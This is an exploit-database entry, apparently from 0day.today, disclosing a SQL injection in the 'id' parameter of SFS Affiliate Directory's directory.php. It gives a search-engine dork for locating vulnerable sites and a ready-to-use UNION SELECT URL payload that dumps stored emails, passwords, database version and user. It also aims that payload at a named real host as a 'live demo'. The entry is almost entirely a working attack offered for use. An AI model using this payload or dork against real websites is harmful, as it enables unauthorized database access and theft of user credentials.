id: 3539
date: 08/18/2008
title: SFS Affiliate Directory (id) SQL Injection Vulnerability
author: Hussin X
cves: 

========================================================
SFS Affiliate Directory (id) SQL Injection Vulnerability
========================================================



|___________________________________________________|
|
| Affiliate Directory ( id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|___________________________________________________
|                                                   |
|
| DorK   : "Copyright 2005 Affiliate Directory"
|___________________________________________________|

Exploit: 


www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--



L!VE DEMO: :


http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--





#  0day.today [2023-03-24]  #